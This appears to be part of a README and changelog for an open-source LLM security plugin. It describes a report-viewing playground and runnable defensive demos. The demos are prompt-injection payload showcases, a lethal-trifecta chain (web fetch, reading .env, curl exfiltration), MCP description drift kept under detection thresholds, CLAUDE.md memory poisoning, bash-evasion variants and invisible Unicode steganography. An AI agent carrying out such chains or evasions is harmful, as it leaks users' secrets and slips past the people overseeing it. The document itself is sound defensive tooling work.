v7.6.0 Tier 3-referanse-case: Playgroundet er nå en visuelt og strukturelt fullført referanse for shared/playground-design-system/ Tier 3-supplementet. 8 nye DS-komponenter integrert i de 18 rapport- rendererne: tfa-flow (lethal trifecta-kjede), mat-ladder (modenhets- stige), suppressed-group (narrative-audit), codepoint-reveal (Unicode- steganografi), top-risks (rangert top-funn), recommendation-card[data- severity] (severity-tinted advisory), risk-meter (band-visualisering 0-100), card--severity-{level} (severity-color findings-cards). Pluss badge--scope-security, verdict-pill-lg og form-progress+fp-step fra wave 1.

Layout:

playground/
├── llm-security-playground.html     ← single-file SPA (~10 700 lines)
├── vendor/
│   └── playground-design-system/    ← synket fra shared/, sjekksum-låst
├── test-fixtures/                   ← markdown-fixtures (én per kommando)
├── screenshots/v7.5.0/              ← Playwright-genererte demobilder (12)
├── screenshots/v7.6.0/              ← v7.6.0 demobilder (12, manuelt generert)
└── A11Y-RAPPORT.md                  ← WCAG 2.1 AA verifisering + Tier 3 ARIA

Hva playgroundet dekker:

  • Onboarding (5 grupper): organisasjon, scope, profil, plattform, compliance. Verdier persisteres som shared-state og prefylles automatisk i alle command-skjemaer.
  • Home: prosjekt-grid, fleet-tracks for posture/scan/red-team. «Last inn demo-data»-knappen aktiverer 3 prosjekter inkludert dft-komplett-demo med alle 18 rapporter ferdig parsed.
  • Catalog: alle 20 kommandoer gruppert i 5 kategorier. Søk filtrerer cards, og «Åpne skjema»-knapp bygger ferdig pipeline-streng for klipp-og- lim til terminalen.
  • Project surface: 4 skjermer (Oversikt / Rapporter / Kontekst / Eksport). Rapporter-tabben har category-tabs (discover / posture / findings-ops / hardening / adversarial / mcp-ops) og lim-inn-import for hver rapport-kommando.

Parser/renderer-arkitektur: Hver produces_report=true-kommando i CATALOG har en parser (markdown → struktur) og en renderer (struktur → DS-komponenter). 18 archetypes støttes: findings, findings-grade, risk-score-meter, posture-cards, dashboard-fleet, red-team-results, diff-report, kanban-buckets, matrix-risk. Parser-kontrakten er { ok: true, data: {...} } | { ok: false, errors: [...] }. Test-fixtures under playground/test-fixtures/ er kontrakt-anker — én markdown-fil per kommando som speiler templates/unified-report.md-formatet.

Eksponerte testing/automasjons-globaler: __store, __navigate, __loadDemoState, __scheduleRender, __PARSERS, __RENDERERS, __CATALOG, __inferVerdict, __inferKeyStats, __renderPageShell, __handlePasteImport. Aktiverer Playwright-styrt navigasjon og programmatisk parser/renderer-test mot fixture-katalogen.

Begrensninger: SPA er en lim-inn-overflate — den kjører ingen scannere selv. Output må komme fra Claude Code (/security scan ...), CLI (node scanners/...) eller stub-fixtures. Demo-state inneholder kun de 3 inline-prosjektene; nye prosjekter er per-bruker og lagres lokalt.


Self-scan

Running node scanners/scan-orchestrator.mjs . on this plugin produces 0 findings (ALLOW) with ~190 suppressions via .llm-security-ignore. Every suppression is explained — a security plugin that documents attack patterns, ships a malicious demo fixture, and tests against deliberately evil code will trigger its own scanners. The entropy scanner flags regex patterns in knowledge/secrets-patterns.md. The taint scanner flags eval(user_input) in test fixtures. The toxic flow analyzer flags the plugin's own commands that use Read+Bash. Remove the ignore file and re-run to see the unsuppressed picture.

The examples/malicious-skill-demo/ directory contains a deliberately malicious "Project Health Dashboard" plugin and a full security assessment. The combined LLM + deterministic pipeline produced 85 findings (24 critical, 24 high, 20 medium, 6 low, 11 info) and verdict BLOCK 100/100 — both layers independently maxed the risk score. A human reviewing the plugin's README.md and SKILL.md would likely miss most of them; the Unicode Tag steganography is literally invisible.

node scanners/scan-orchestrator.mjs examples/malicious-skill-demo/evil-project-health/   # ~5s
/security scan examples/malicious-skill-demo/evil-project-health/ --deep                  # full pipeline

Other runnable examples

The examples/ directory contains additional self-contained demonstrations — each with README.md, fixture, run script, and expected-findings.md:

  • prompt-injection-showcase/ — 61 payloads across 19 categories fed to pre-prompt-inject-scan, post-mcp-verify, and pre-bash-destructive. Run: node examples/prompt-injection-showcase/run-showcase.mjs
  • lethal-trifecta-walkthrough/ — 5-step Rule-of-Two demonstration (WebFetch → Read .env → Bash curl POST + suppression follow-ups) showing post-session-guard advisory firing on leg 3. State-isolated via run-script PID. Run: node examples/lethal-trifecta-walkthrough/run-trifecta.mjs
  • mcp-rug-pull/ — 8-stage MCP description drift, each step under the 10% per-update threshold but cumulatively >25% from baseline. Demonstrates the v7.3.0 cumulative-drift advisory (E14, OWASP MCP05). Cache isolated via LLM_SECURITY_MCP_CACHE_FILE. Run: node examples/mcp-rug-pull/run-rug-pull.mjs
  • supply-chain-attack/ — two-layer demonstration: PreToolUse hook blocks compromised event-stream@3.3.6 and advises on scope-hopping @evilcorp/lodash; offline dep-auditor flags 5 typosquats + a postinstall: curl ... | sh vector in the fixture package.json. Run: node examples/supply-chain-attack/run-supply-chain.mjs
  • poisoned-claude-md/ — 6 memory-poisoning detectors fire on a fixture CLAUDE.md + agent file (E15 surface). Demonstrates injection, shell-command, suspicious-URL, credential-path, permission-expansion, and base64-encoded-payload detection. Run: node examples/poisoned-claude-md/run-memory-poisoning.mjs
  • bash-evasion-gallery/ — one disguised variant per T-tag (T1-T9) fed through pre-bash-destructive, verified BLOCK after bash-normalize strips the evasion. T8 has its own BLOCK_RULE. Run: node examples/bash-evasion-gallery/run-evasion-gallery.mjs
  • toxic-agent-demo/ — single-component lethal trifecta detected by the toxic-flow-analyzer (TFA). A fixture agent with tools: [Bash, Read, WebFetch] covers all three trifecta legs (untrusted input + sensitive data access + exfil sink), and the fixture deliberately ships no hooks/hooks.json so TFA emits a CRITICAL Lethal trifecta: finding without mitigation downgrade. Uses plugin.fixture.json as the plugin marker so the example doesn't trip pre-write-pathguard on .claude-plugin/. Maps to ASI01 / ASI02 / ASI05 / LLM01 / LLM02 / LLM06. Run: node examples/toxic-agent-demo/run-toxic-flow.mjs
  • pre-compact-poisoning/pre-compact-scan PreCompact hook detecting both an injection pattern and a credential-shaped string in a synthetic transcript across all three modes (off / warn / block). The transcript is generated at runtime in a per-invocation tempdir; the AWS-shaped key uses the same 'AK' + 'IA' + ... fragmentation idiom as tests/e2e/attack-chain.test.mjs, so the source contains no literal credentials. Includes a benign-transcript control case in block mode to prove the gate is not a brick wall. Maps to LLM01 / LLM02 / ASI01 / AT-1 / AT-3. Run: node examples/pre-compact-poisoning/run-pre-compact-poisoning.mjs

Recent versions

Version Date Highlights
7.6.1 2026-05-06 Playground v7.6.0 visuell-patch. Seks bugs fanget under maintainer-verifisering i nettleser. Alle skyldtes mismatch mellom DS-klasser og rendrer-bruk (eller manglende DS-implementasjoner playground antok eksisterte). (1) renderFindingsBlock brukte .findings outer som er DS' 2-kolonners list+detail-grid → erstattet med <section class="report-meta"> + korrekt findings__list > findings__group-mønster. (2) .report-table manglet helt i DS men brukes i 7+ rendrere → lokal CSS-implementasjon i playground-HTML. (3) renderPreDeploy traffic-lights brukte .sm-card__grade (28×28 px for én A-F-bokstav) for "PASS"/"PASS-WITH-NOTES"/"FAIL" → erstattet med bredde-tilpasset status-pill. (4) Threat-model matrix-bobler ikke klikkbare → <button> med data-threat-id + click-handler som scroller til Trusler-tabellen. (5) Radar-labels overlappet ved 6+ akser → SVG 280→380, R 105→125, dynamisk text-anchor (start/end/middle) basert på horisontal-posisjon. (6) recommendation-card__body overflow på lange tekster → overflow-wrap: anywhere. 4/4 fix-spesifikke smoke-tester + 18/18 renderer-regresjon passerer. Ingen scanner- eller hook-atferdsendringer — purely additive surface.
7.6.0 2026-05-06 Playground Tier 3-referanse-case. Playground (playground/llm-security-playground.html) hevet til visuelt og strukturelt fullført referanse for shared/playground-design-system/ Tier 3-supplementet. 8 nye DS-komponenter integrert i de 18 rapport-rendererne: tfa-flow + tfa-leg + tfa-arrow (lethal trifecta-kjede med <button>-elementer + ARIA), mat-ladder + mat-step (5-trinns modenhets-stige med terskler 0/25/50/75/95% PASS), suppressed-group (narrative-audit fra summary.narrative_audit.suppressed_findings), codepoint-reveal + cp-tag/cp-zw/cp-bidi (Unicode-steganografi side-ved-side), top-risks + top-risk[data-severity] (rangert top-funn-listing, semantisk <ol>), recommendation-card[data-severity] (severity-tinted advisory på clean/harden/audit/posture/pre-deploy/plugin-audit), risk-meter (band-visualisering 0-100 på 5 archetypes), card--severity-{level} (severity-color modifier på findings-cards). Wave 1: badge--scope-security (identitets-chip), verdict-pill-lg (DS Tier 3-pill), form-progress + fp-step (onboarding-wizard). Slettet ~30 duplikat-CSS-deklarasjoner (DS vinner cascade). 5 nye DS-helpers + mapSeverityToCardLevel + parseNarrativeAudit. Filendring 10209 → 10677 linjer. Levert over 5 sesjoner, atomic commits. A11Y-rapport oppdatert. Ingen scanner- eller hook-behavior-changes — purely additive surface.
7.5.0 2026-05-05 Playground. Single-file SPA at playground/llm-security-playground.html (~10 200 lines) for onboarding, demoer og workshop-bruk uten Claude Code-installasjon. Parsere + renderere for alle 18 produces_report=true-kommandoer (Fase 2: 10 høy-prio + Fase 3: 8 gjenstående: mcp-inspect, supply-check, pre-deploy, diff, watch, registry, clean, threat-model). 18 markdown test-fixtures under playground/test-fixtures/ som kontrakt-anker. Komplett demo-prosjekt dft-komplett-demo har alle 18 rapporter ferdig parsed inline. Vendor-synket design-system under playground/vendor/ (sjekksum-låst). 9 Playwright-genererte screenshots i playground/screenshots/v7.5.0/. 11 nye window-globaler for testing/automasjon. 2 nye KEY_STATS_CONFIG-archetypes (kanban-buckets, matrix-risk). Bug-fix: normalizeVerdictText regex-rekkefølge oppdatert så GO-WITH-CONDITIONS / CONDITIONAL / BETINGET ikke lenger kollapser til ALLOW. Ingen scanner- eller hook-behavior-changes — purely additive surface.
7.4.0 2026-05-05 Examples + e2e suite. Seven runnable demonstration walkthroughs under examples/ (prompt-injection-showcase, lethal-trifecta-walkthrough, mcp-rug-pull, supply-chain-attack, poisoned-claude-md, bash-evasion-gallery, toxic-agent-demo, pre-compact-poisoning) — each with README.md, runtime-isolated fixture, single-command run-script, and expected-findings.md testable contract. Three new tests/e2e/ suites (attack-chain 17 tests + multi-session 9 tests + scan-pipeline 19 tests = +45 tests, total 1822) prove the framework works as a coordinated system, not just isolated units. No scanner or hook behavior changes — purely additive surface. Scanner VERSION constants synced across dashboard-aggregator.mjs, posture-scanner.mjs, ide-extension-scanner.mjs.
7.3.1 2026-05-01 Stabilization patch. Project repositioned as solo, stabilization-only, with explicit "fork & own" stance for enterprise features. New public docs: CONTRIBUTING.md (fork-and-own model), README "Project scope" section (out-of-scope table with commercial alternatives), updated SECURITY.md (v7.3.x supported, v7.0v7.2 best-effort, < v7.0 EOL). Coherence: package.json files whitelist + bugs URL + repo URL fix; scanner VERSION constants synced across dashboard-aggregator.mjs, posture-scanner.mjs, ide-extension-scanner.mjs. Test ceiling raised on flaky pre-compact-scan timing test (500 ms → 1000 ms; design target unchanged). No behavior changes.
7.3.0 2026-05-01 Batch C release. Wave A (T7-T9 bash normalization + rot13 comment-block decoder), Wave B (.gitattributes post-clone advisory + npm scope-hop typosquat + GitHub/Forgejo workflow-scanner with 23-field blacklist + re-interpolation tracking + auth-bypass detection), Wave C (MCP cumulative-drift baseline + /security mcp-baseline-reset), Wave D (riskScoreV1 @deprecated; sandbox-architecture rationale docs; env-var deprecation runway to v8.0.0; CLAUDE.md hooks count + consistency test). 1665+ → 1777 tests. Wave E (additional attack-simulator scenarios) deferred indefinitely
7.2.0 2026-04-29 Batch B release. Critical-review B-tier scanner defects + v7.2.0 evasion-arsenal (PUA-A/B Unicode coverage, NFKC homoglyph fold, escalation-after-input window, markdown link-title + SVG <desc>/<foreignObject> + HTML comment extractors). Two-stage entropy context classification. v1→v2 risk-formula constants unified across docs. 8 new red-team scenarios (64 → 72). 1522 → 1665 tests
7.1.0 2026-04-29 Critical-review patch. Pathguard regex hole closed (.env.production.local.backup-class). Distributed-trifecta block-mode AND-gate removed. CaMeL claim toned down to honest "byte-fingerprint matching". Documentation honesty-sweep across 7 overclaim sites. 1487 → 1511 tests

Full history in CHANGELOG.md.


License & attribution

MIT. See LICENSE.

Built on published research from OWASP, ToxicSkills (Xi'an Jiaotong, 2025), ClawHavoc (Repello AI, 2025), MCPTox, Pillar Security, Invariant Labs, GHSL Security Lab, Operant AI, and Google DeepMind's AI Agent Traps taxonomy. Threat patterns and case studies in knowledge/ are cited inline.


Feedback & contributing

  • Bug reports + feature requests: open an issue on Forgejo
  • Pull requests: not accepted on this repo (solo project, dialog-driven development with Claude Code). For larger changes, see CONTRIBUTING.md and the fork-and-own model
  • Security disclosures: see SECURITY.md — please email, do not open a public issue
  • Project scope: see "Project scope" section above for what is and isn't on the roadmap, and what to fork for instead